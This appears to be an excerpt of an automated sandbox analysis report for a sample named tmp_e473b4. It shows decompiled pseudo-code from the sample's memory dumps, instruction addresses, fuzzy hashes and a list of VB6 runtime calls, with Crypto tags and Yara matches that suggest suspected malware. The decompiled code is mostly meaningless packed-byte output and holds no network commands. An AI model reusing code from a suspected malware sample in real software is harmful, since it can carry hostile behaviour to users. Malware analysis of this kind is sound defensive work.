				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t83;
				 *_t83 =  *_t83 + _t108;
				ss =  *((intOrPtr*)(_t106 + 0x16));
				 *(_t120 - 0x71cfcfaf) =  *(_t120 - 0x71cfcfaf) ^ _t106;
				_push(_t106);
				 *(_t120 - 0x71cfacaf) =  *(_t120 - 0x71cfacaf) ^ _t106;
				_t84 = _t106;
				 *(_t120 - 0x71cfadaf) =  *(_t120 - 0x71cfadaf) ^ _t106;
				_push(_t106);
				_t113 = _t112 - 1;
				_t10 = _t120 - 0x71cfa6af;
				 *_t10 =  *(_t120 - 0x71cfa6af) ^ _t106;
				_push(_t106);
				if( *_t10 >= 0) {
					L2:
					ss =  *((intOrPtr*)(_t106 + 0x73));
					 *(_t120 - 0x71cfa1af) =  *(_t120 - 0x71cfa1af) ^ _t106;
					_push(_t106);
					_push(_t84);
					 *(_t120 - 0x71cfa0af) =  *(_t120 - 0x71cfa0af) ^ _t106;
					_push(_t106);
					asm("aas");
					 *(_t120 - 0x71cfc6af) =  *(_t120 - 0x71cfc6af) ^ _t106;
					_push(_t106);
					asm("adc eax, [eax]");
					 *_t84 =  *_t84 + _t84;
					 *_t84 =  *_t84 + _t84;
					 *_t84 =  *_t84 + _t84;
					 *_t84 =  *_t84 + _t84;
					 *_t84 =  *_t84 + _t84;
					 *_t84 =  *_t84 + _t108;
					ss =  *((intOrPtr*)(_t106 - 0x7d));
					 *(_t120 - 0x71cf28af) =  *(_t120 - 0x71cf28af) ^ _t106;
					L3:
					ss =  *((intOrPtr*)(_t106 - 0x17));
					 *(_t120 - 0x71cf13af) =  *(_t120 - 0x71cf13af) ^ _t106;
					ss =  *((intOrPtr*)(_t106 - 0xb));
					 *(_t120 - 0x71cf04af) =  *(_t120 - 0x71cf04af) ^ _t106;
					_push(_t106);
					asm("clc");
					 *(_t120 - 0x71cf0aaf) =  *(_t120 - 0x71cf0aaf) ^ _t106;
					_push(_t106);
					asm("in eax, dx");
					 *(_t120 - 0x71cf0caf) =  *(_t120 - 0x71cf0caf) ^ _t106;
					_push(_t106);
					asm("sti");
					 *(_t120 - 0x71cf09af) =  *(_t120 - 0x71cf09af) ^ _t106;
					_push(_t106);
					asm("hlt");
					 *(_t120 - 0x71cf03af) =  *(_t120 - 0x71cf03af) ^ _t106;
					_push(_t106);
					asm("stc");
					 *(_t120 - 0x71cf0caf) =  *(_t120 - 0x71cf0caf) ^ _t106;
					_push(_t106);
					asm("stc");
					 *(_t120 - 0x71cf03af) =  *(_t120 - 0x71cf03af) ^ _t106;
					_push(_t106);
					asm("cld");
					 *(_t120 - 0x71cf05af) =  *(_t120 - 0x71cf05af) ^ _t106;
					_push(_t106);
					asm("std");
					 *(_t120 - 0x71cf01af) =  *(_t120 - 0x71cf01af) ^ _t106;
					_push(_t106);
					asm("sti");
					 *(_t120 - 0x71cf07af) =  *(_t120 - 0x71cf07af) ^ _t106;
					_t122 = _t106;
					 *_t113 =  *_t113 >> _t106;
					asm("fistp qword [esi]");
					asm("loope 0x3f");
					_t88 = _t122;
					asm("pushad");
					asm("les edi, [edi]");
					_pop(_t133);
					asm("loop 0x40");
					asm("xlatb");
					_t107 = _t106 + 1;
					asm("pushad");
					 *_t88 =  *_t88 >> 1;
					asm("aam 0x3b");
					asm("loop 0x41");
					asm("int3");
					asm("fidivr dword [edi]");
					_t127 = _t133;
					_pop(_t136);
					asm("fild word [edx-0x69]");
					asm("pushad");
					asm("pushad");
					asm("fdivr dword [esp+edx*4]");
					asm("fidivr word [ebx]");
					_pop(_t111);
					asm("fistp qword [esi]");
					_t101 = _t136;
					L7:
					_pop(_t138);
					asm("fnstsw word [esi]");
					_t102 = _t138;
					asm("aad 0x31");
					ss =  *((intOrPtr*)(_t111 - 0x6c));
					 *(_t127 - 0x71cfa1af) =  *(_t127 - 0x71cfa1af) ^ _t107;
					_push(_t107);
					_push(ss);
					 *_t102 =  *_t102 + _t102;
					 *_t102 =  *_t102 + _t102;
					 *_t102 =  *_t102 + _t102;
					 *_t102 =  *_t102 + _t102;
					 *_t102 =  *_t102 + _t102;
					 *_t102 =  *_t102 + _t102;
					_t101 = _t107;
					_t107 = _t102;
					_push(_t127);
					_push(_t101);
					asm("lahf");
					asm("insb");
					goto L7;
				}
				ss =  *((intOrPtr*)(_t106 + 0x73));
				 *(_t120 - 0x71cf8eaf) =  *(_t120 - 0x71cf8eaf) ^ _t106;
				_push(_t106);
				 *_t84 = _t120;
				ss =  *((intOrPtr*)(_t106 - 0x73));
				 *( *_t84 - 0x71cf84af) =  *( *_t84 - 0x71cf84af) ^ _t106;
				_push(_t106);
				_t120 = _t84;
				ss =  *((intOrPtr*)(_t106 - 0x72));
				 *(_t120 - 0x71cf64af) =  *(_t120 - 0x71cf64af) ^ _t106;
				_push(_t106);
				_t22 = _t108;
				_t108 =  *_t84;
				 *_t84 = _t22;
				ss =  *((intOrPtr*)(_t106 - 0x76));
				_t24 = _t120 - 0x71cf6faf;
				 *_t24 =  *(_t120 - 0x71cf6faf) ^ _t106;
				_push(_t106);
				if( *_t24 > 0) {
					goto L3;
				}
				goto L2;
			}





















                                                                                0x00409350
                                                                                0x00409351
                                                                                0x00409353
                                                                                0x00409355
                                                                                0x00409357
                                                                                0x00409359
                                                                                0x0040935b
                                                                                0x00409361
                                                                                0x00409363
                                                                                0x00409365
                                                                                0x00409367
                                                                                0x00409369
                                                                                0x0040936b
                                                                                0x0040936d
                                                                                0x0040936f
                                                                                0x00409371
                                                                                0x00409373
                                                                                0x00409375
                                                                                0x00409377
                                                                                0x00409379
                                                                                0x0040937b
                                                                                0x0040937d
                                                                                0x0040937f
                                                                                0x00409381
                                                                                0x00409383
                                                                                0x00409385
                                                                                0x00409387
                                                                                0x00409389
                                                                                0x0040938b
                                                                                0x0040938d
                                                                                0x0040938f
                                                                                0x00409391
                                                                                0x00409393
                                                                                0x00409395
                                                                                0x00409397
                                                                                0x00409399
                                                                                0x0040939b
                                                                                0x0040939d
                                                                                0x0040939f
                                                                                0x004093a1
                                                                                0x004093a3
                                                                                0x004093a5
                                                                                0x004093a7
                                                                                0x004093a9
                                                                                0x004093ab
                                                                                0x004093ad
                                                                                0x004093af
                                                                                0x004093b1
                                                                                0x004093b3
                                                                                0x004093b5
                                                                                0x004093b7
                                                                                0x004093b9
                                                                                0x004093bb
                                                                                0x004093bd
                                                                                0x004093bf
                                                                                0x004093c1
                                                                                0x004093c3
                                                                                0x004093c5
                                                                                0x004093c7
                                                                                0x004093c9
                                                                                0x004093cb
                                                                                0x004093cd
                                                                                0x004093cf
                                                                                0x004093d1
                                                                                0x004093d3
                                                                                0x004093d5
                                                                                0x004093d7
                                                                                0x004093d9
                                                                                0x004093db
                                                                                0x004093dd
                                                                                0x004093df
                                                                                0x004093e1
                                                                                0x004093e3
                                                                                0x004093e5
                                                                                0x004093e7
                                                                                0x004093e9
                                                                                0x004093eb
                                                                                0x004093ed
                                                                                0x004093ef
                                                                                0x004093f1
                                                                                0x004093f3
                                                                                0x004093f5
                                                                                0x004093f7
                                                                                0x004093f9
                                                                                0x004093fc
                                                                                0x00409402
                                                                                0x00409404
                                                                                0x0040940b
                                                                                0x0040940c
                                                                                0x00409412
                                                                                0x00409413
                                                                                0x00409414
                                                                                0x00409414
                                                                                0x0040941a
                                                                                0x0040941b
                                                                                0x0040944d
                                                                                0x0040944d
                                                                                0x00409450
                                                                                0x00409456
                                                                                0x00409457
                                                                                0x00409458
                                                                                0x0040945e
                                                                                0x0040945f
                                                                                0x00409460
                                                                                0x00409466
                                                                                0x00409467
                                                                                0x00409469
                                                                                0x0040946b
                                                                                0x0040946d
                                                                                0x0040946f
                                                                                0x00409471
                                                                                0x00409473
                                                                                0x00409475
                                                                                0x00409478
                                                                                0x0040947d
                                                                                0x0040947d
                                                                                0x00409480
                                                                                0x00409485
                                                                                0x00409488
                                                                                0x0040948e
                                                                                0x0040948f
                                                                                0x00409490
                                                                                0x00409496
                                                                                0x00409497
                                                                                0x00409498
                                                                                0x0040949e
                                                                                0x0040949f
                                                                                0x004094a0
                                                                                0x004094a6
                                                                                0x004094a7
                                                                                0x004094a8
                                                                                0x004094ae
                                                                                0x004094af
                                                                                0x004094b0
                                                                                0x004094b6
                                                                                0x004094b7
                                                                                0x004094b8
                                                                                0x004094be
                                                                                0x004094bf
                                                                                0x004094c0
                                                                                0x004094c6
                                                                                0x004094c7
                                                                                0x004094c8
                                                                                0x004094ce
                                                                                0x004094cf
                                                                                0x004094d0
                                                                                0x0040950a
                                                                                0x0040950b
                                                                                0x0040950f
                                                                                0x00409513
                                                                                0x00409515
                                                                                0x0040951e
                                                                                0x00409523
                                                                                0x00409526
                                                                                0x00409527
                                                                                0x0040952b
                                                                                0x0040952c
                                                                                0x0040952e
                                                                                0x0040952f
                                                                                0x00409533
                                                                                0x00409537
                                                                                0x0040953b
                                                                                0x00409543
                                                                                0x00409545
                                                                                0x00409546
                                                                                0x00409547
                                                                                0x0040954a
                                                                                0x0040954e
                                                                                0x0040954f
                                                                                0x00409553
                                                                                0x00409556
                                                                                0x00409557
                                                                                0x00409559
                                                                                0x0040955a
                                                                                0x0040955a
                                                                                0x0040955b
                                                                                0x0040955d
                                                                                0x0040955f
                                                                                0x00409561
                                                                                0x00409564
                                                                                0x0040956a
                                                                                0x0040956b
                                                                                0x0040956c
                                                                                0x0040956e
                                                                                0x00409570
                                                                                0x00409572
                                                                                0x00409574
                                                                                0x00409576
                                                                                0x00409578
                                                                                0x00409578
                                                                                0x0040957a
                                                                                0x0040957b
                                                                                0x0040957d
                                                                                0x0040957e
                                                                                0x00000000
                                                                                0x0040957e
                                                                                0x0040941d
                                                                                0x00409420
                                                                                0x00409426
                                                                                0x00409427
                                                                                0x00409429
                                                                                0x0040942c
                                                                                0x00409432
                                                                                0x00409433
                                                                                0x00409435
                                                                                0x00409438
                                                                                0x0040943e
                                                                                0x0040943f
                                                                                0x0040943f
                                                                                0x0040943f
                                                                                0x00409441
                                                                                0x00409444
                                                                                0x00409444
                                                                                0x0040944a
                                                                                0x0040944b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b7faa4242ddfb469e10d24f59bc417fd62dce5f77ec19fce019f4b7884fe771
                                                                                • Instruction ID: dc36856f75deaff5d1664bd4aaa7f17e3064bd2aa8a58e43876811db7a75c472
                                                                                • Opcode Fuzzy Hash: 7b7faa4242ddfb469e10d24f59bc417fd62dce5f77ec19fce019f4b7884fe771
                                                                                • Instruction Fuzzy Hash: 5741715355EAD2EEE31B8BB89C19453FF986D479203090EDED0E09F093E196492DC367
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004052D4, Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ff51a9e06bdb94a099717903e7cf8c20d7800a316cdafb28058dd3f8e4162e5
                                                                                • Instruction ID: c9b8e15257a981657f70bb293d509f30b5fa247d60b9d2eb96ec0f9db1b19867
                                                                                • Opcode Fuzzy Hash: 5ff51a9e06bdb94a099717903e7cf8c20d7800a316cdafb28058dd3f8e4162e5
                                                                                • Instruction Fuzzy Hash: 34218B5A426EC1EEA30A47B5D80A467FFA9EE4EA503540ECDE2D11F263F2670138D316
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040314D, Relevance: .0, Instructions: 47COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E0040314D(intOrPtr* __eax, signed int __ecx, signed int __esi) {
				intOrPtr* _t88;
				signed int _t91;

				ss =  *((intOrPtr*)(__ecx - 1));
				 *(__esi - 0x71cf01af) =  *(__esi - 0x71cf01af) ^ __ecx;
				_push(__ecx);
				_push( *__eax);
				ss =  *((intOrPtr*)(__ecx - 1));
				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
				_push(__ecx);
				_push( *__eax);
				ss =  *((intOrPtr*)(__ecx - 2));
				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
				_push(__ecx);
				asm("sti");
				 *(__esi - 0x71cf03af) =  *(__esi - 0x71cf03af) ^ __ecx;
				_push(__ecx);
				_push( *__eax);
				ss =  *((intOrPtr*)(__ecx - 0xe));
				 *(__esi - 0x71cf0faf) =  *(__esi - 0x71cf0faf) ^ __ecx;
				_push(__ecx);
				asm("cli");
				 *(__esi - 0x71cf00af) =  *(__esi - 0x71cf00af) ^ __ecx;
				_push(__ecx);
				asm("hlt");
				 *(__esi - 0x71cf0aaf) =  *(__esi - 0x71cf0aaf) ^ __ecx;
				_push(__ecx);
				asm("out dx, al");
				 *(__esi + 0x2851) =  *(__esi + 0x2851) ^ __ecx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *(__esi - 0x71cfd8af) =  *(__esi - 0x71cfd8af) ^ __ecx;
				_push(__ecx);
				 *(__eax - 0x71cf3eaf) =  *(__eax - 0x71cf3eaf) ^ __ecx;
				_push(__ecx);
				 *__esi =  *__esi << 0x8e;
				_push(__ecx);
				asm("out dx, al");
				 *(__eax - 0x71cf0baf) =  *(__eax - 0x71cf0baf) ^ __ecx;
				_push(__ecx);
				asm("out dx, al");
				 *(__eax - 0x71cf09af) =  *(__eax - 0x71cf09af) ^ __ecx;
				_push(__ecx);
				goto 0xf591c000;
				 *(__eax - 0x71cf1baf) =  *(__eax - 0x71cf1baf) ^ __ecx;
				ss =  *((intOrPtr*)(__ecx - 0x1c));
				 *(__eax - 0x71cf10af) =  *(__eax - 0x71cf10af) ^ __ecx;
				_push(__ecx);
				asm("clc");
				 *(__eax - 0x71cf11af) =  *(__eax - 0x71cf11af) ^ __ecx;
				_push(__ecx);
				_t91 = __esi %  *__esi;
				ss =  *((intOrPtr*)(__ecx - 2));
				 *(__eax - 0x71cf0aaf) =  *(__eax - 0x71cf0aaf) ^ __ecx;
				_push(__ecx);
				asm("lock xor [esi-0x71cf0daf], cl");
				_push(__ecx);
				asm("jecxz 0x32");
				ss =  *((intOrPtr*)(__ecx - 0x26));
				 *(__eax - 0x71cf23af) =  *(__eax - 0x71cf23af) ^ __ecx;
				_push(__ecx);
				asm("fidiv dword [eax]");
				ss =  *((intOrPtr*)(__ecx - 0x12));
				 *(__eax - 0x71cf03af) =  *(__eax - 0x71cf03af) ^ __ecx;
				_push(__ecx);
				asm("hlt");
				 *(__eax - 0x71cf1daf) =  *(__eax - 0x71cf1daf) ^ __ecx;
				_push(__ecx);
				_push(__ecx);
				asm("fnstenv [eax]");
				ss =  *((intOrPtr*)(__ecx - 0x15));
				 *(__eax - 0x71cf02af) =  *(__eax - 0x71cf02af) ^ __ecx;
				_push(__ecx);
				asm("lock xor [esi-0x71cf15af], cl");
				_push(__ecx);
				asm("iretd");
				 *(__eax - 0x71cf25af) =  *(__eax - 0x71cf25af) ^ __ecx;
				_push(__ecx);
				asm("fidiv dword [eax]");
				ss =  *((intOrPtr*)(__ecx - 0x13));
				 *(__eax - 0x71cf13af) =  *(__eax - 0x71cf13af) ^ __ecx;
				_push(__ecx);
				asm("in al, dx");
				 *(__eax - 0x71cf10af) =  *(__eax - 0x71cf10af) ^ __ecx;
				_push(__ecx);
				asm("clc");
				 *(__eax - 0x71cf0eaf) =  *(__eax - 0x71cf0eaf) ^ __ecx;
				_push(__ecx);
				asm("in eax, 0x30");
				ss =  *((intOrPtr*)(__ecx - 0x1d));
				 *(__eax - 0x71cf0daf) =  *(__eax - 0x71cf0daf) ^ __ecx;
				_push(__ecx);
				asm("int1");
				 *(__eax - 0x71cf08af) =  *(__eax - 0x71cf08af) ^ __ecx;
				_push(__ecx);
				asm("stc");
				 *(__eax - 0x71cf16af) =  *(__eax - 0x71cf16af) ^ __ecx;
				_push(__ecx);
				asm("repe xor [esi-0x71cf16af], cl");
				ss =  *((intOrPtr*)(__ecx - 0x17));
				 *(__eax - 0x71cf12af) =  *(__eax - 0x71cf12af) ^ __ecx;
				_push(__ecx);
				asm("cmc");
				 *(__eax - 0x71cf33af) =  *(__eax - 0x71cf33af) ^ __ecx;
				_push(__ecx);
				ss =  *0xFFFFFFFFFFFFFFFF;
				 *(__eax - 0x71cf1daf) =  *(__eax - 0x71cf1daf) ^ 0x00000030;
				 *(__eax + 0x5851) =  *(__eax + 0x5851) ^ 0x00000030;
				_t88 = 0x30;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *_t88 =  *_t88 + _t88;
				 *0x30 =  *0x30 + _t91;
				ss =  *((intOrPtr*)(_t91 + 6));
				 *(__eax - 0x6eca46af) =  *(__eax - 0x6eca46af) ^ 0x00000030;
				return _t88;
			}





                                                                                0x0040314d
                                                                                0x00403150
                                                                                0x00403156
                                                                                0x00403157
                                                                                0x00403159
                                                                                0x0040315c
                                                                                0x00403162
                                                                                0x00403163
                                                                                0x00403165
                                                                                0x00403168
                                                                                0x0040316e
                                                                                0x0040316f
                                                                                0x00403170
                                                                                0x00403176
                                                                                0x00403177
                                                                                0x00403179
                                                                                0x0040317c
                                                                                0x00403182
                                                                                0x00403183
                                                                                0x00403184
                                                                                0x0040318a
                                                                                0x0040318b
                                                                                0x0040318c
                                                                                0x00403192
                                                                                0x00403193
                                                                                0x00403194
                                                                                0x0040319a
                                                                                0x0040319c
                                                                                0x0040319e
                                                                                0x004031a0
                                                                                0x004031a2
                                                                                0x004031a4
                                                                                0x004031a6
                                                                                0x004031a8
                                                                                0x004031ae
                                                                                0x004031b0
                                                                                0x004031b6
                                                                                0x004031b7
                                                                                0x004031ba
                                                                                0x004031bb
                                                                                0x004031bc
                                                                                0x004031c2
                                                                                0x004031c3
                                                                                0x004031c4
                                                                                0x004031ca
                                                                                0x004031cb
                                                                                0x004031d0
                                                                                0x004031d1
                                                                                0x004031d4
                                                                                0x004031da
                                                                                0x004031db
                                                                                0x004031dc
                                                                                0x004031e2
                                                                                0x004031e3
                                                                                0x004031e5
                                                                                0x004031e8
                                                                                0x004031ee
                                                                                0x004031ef
                                                                                0x004031f6
                                                                                0x004031f7
                                                                                0x004031f9
                                                                                0x004031fc
                                                                                0x00403202
                                                                                0x00403203
                                                                                0x00403205
                                                                                0x00403208
                                                                                0x0040320e
                                                                                0x0040320f
                                                                                0x00403210
                                                                                0x00403216
                                                                                0x0040321e
                                                                                0x0040321f
                                                                                0x00403221
                                                                                0x00403224
                                                                                0x0040322a
                                                                                0x0040322b
                                                                                0x00403232
                                                                                0x00403233
                                                                                0x00403234
                                                                                0x00403236
                                                                                0x00403237
                                                                                0x00403239
                                                                                0x0040323c
                                                                                0x00403242
                                                                                0x00403243
                                                                                0x00403244
                                                                                0x0040324a
                                                                                0x0040324b
                                                                                0x0040324c
                                                                                0x00403252
                                                                                0x00403253
                                                                                0x00403255
                                                                                0x00403258
                                                                                0x0040325e
                                                                                0x0040325f
                                                                                0x00403260
                                                                                0x00403266
                                                                                0x00403267
                                                                                0x00403268
                                                                                0x0040326e
                                                                                0x0040326f
                                                                                0x00403271
                                                                                0x00403274
                                                                                0x0040327a
                                                                                0x0040327b
                                                                                0x0040327c
                                                                                0x00403282
                                                                                0x00403285
                                                                                0x00403288
                                                                                0x00403290
                                                                                0x00403293
                                                                                0x00403294
                                                                                0x00403296
                                                                                0x00403298
                                                                                0x0040329a
                                                                                0x0040329c
                                                                                0x0040329e
                                                                                0x004032a0
                                                                                0x004032a2
                                                                                0x004032a4
                                                                                0x004032a6
                                                                                0x004032a8
                                                                                0x004032aa
                                                                                0x004032ab
                                                                                0x004032ad
                                                                                0x004032af
                                                                                0x004032b1
                                                                                0x004032b3
                                                                                0x004032b5
                                                                                0x004032b8
                                                                                0x004032bf

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b23c9238bf0d27cf2fb93fde19b2eb137b6097d95fe459933858b00c57a33c6c
                                                                                • Instruction ID: bda015628b82448aa2b50c3ac2d00462a791f464b5dab21b6db34c0d45f36fba
                                                                                • Opcode Fuzzy Hash: b23c9238bf0d27cf2fb93fde19b2eb137b6097d95fe459933858b00c57a33c6c
                                                                                • Instruction Fuzzy Hash: 9D01004656AAD2EEF71E47B4980A853FE9A6E469643490FCDE1E51E093A183053CC217
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A4DF0, Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E007A4DF0() {

				return  *[fs:0x30];
			}



                                                                                0x007a4df6

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041FEF0, Relevance: 75.4, APIs: 28, Strings: 15, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF39
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401968,004113E8,00000024,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF58
                                                                                  • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                                                  • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60 ref: 00424247
                                                                                  • Part of subcall function 004241F0: __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 00424269
                                                                                  • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                                                  • Part of subcall function 004241F0: __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                                                  • Part of subcall function 004241F0: __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                                                  • Part of subcall function 004241F0: #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242CD
                                                                                  • Part of subcall function 004241F0: #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                                                  • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242DD
                                                                                  • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                                                  • Part of subcall function 004241F0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                                                  • Part of subcall function 004241F0: __vbaFreeVar.MSVBVM60 ref: 00424309
                                                                                • __vbaStrCmp.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF6C
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FF7B
                                                                                • __vbaStrMove.MSVBVM60(?,0040F3C8,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFA3
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFAA
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFB3
                                                                                • __vbaStrMove.MSVBVM60(?,shape,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFCC
                                                                                • __vbaStrCmp.MSVBVM60(rect,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFD7
                                                                                • __vbaStrCmp.MSVBVM60(rectangle,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFE6
                                                                                • __vbaStrCmp.MSVBVM60(circ,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041FFF5
                                                                                • __vbaStrCmp.MSVBVM60(circle,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420004
                                                                                • __vbaStrCmp.MSVBVM60(poly,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420013
                                                                                • __vbaStrCmp.MSVBVM60(polygon,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420022
                                                                                • __vbaStrMove.MSVBVM60(?,coords), ref: 00420054
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0042005B
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00420064
                                                                                • __vbaStrMove.MSVBVM60(?,href), ref: 0042007D
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00420084
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0042008D
                                                                                • __vbaStrMove.MSVBVM60(?,target), ref: 004200A6
                                                                                • __vbaStrCmp.MSVBVM60(_blank,?), ref: 004200B1
                                                                                • __vbaStrCmp.MSVBVM60(_parent,?), ref: 004200C9
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,00420155,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00420142
